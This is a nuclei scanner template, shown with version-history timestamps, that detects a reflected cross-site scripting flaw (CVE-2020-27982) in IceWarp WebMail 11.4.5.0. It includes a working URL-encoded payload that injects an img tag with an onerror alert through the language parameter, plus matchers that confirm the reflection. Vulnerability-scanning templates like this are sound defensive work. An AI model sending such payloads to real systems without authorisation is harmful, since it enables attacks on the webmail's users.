nuclei-templates/cves/2020/CVE-2020-27982.yaml

38 lines
1014 B
YAML
Raw Normal View History

2021-02-14 20:58:07 +00:00
id: CVE-2020-27982
2021-02-14 20:58:07 +00:00
info:
name: IceWarp WebMail Reflected XSS
author: madrobot
severity: medium
2021-03-24 06:50:31 +00:00
description: IceWarp 11.4.5.0 allows XSS via the language parameter.
reference:
- https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
- http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
- https://cxsecurity.com/issue/WLB-2020100161
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-27982
cwe-id: CWE-79
tags: cve,cve2020,xss,icewarp
2021-02-14 20:58:07 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
2021-02-15 19:05:52 +00:00
2021-02-14 20:58:07 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-02-15 19:05:52 +00:00
2021-02-14 20:58:07 +00:00
- type: word
words:
- "<img src=x onerror=alert(1)>"
part: body
2021-02-15 19:05:52 +00:00
- type: word
words:
- "text/html"
part: header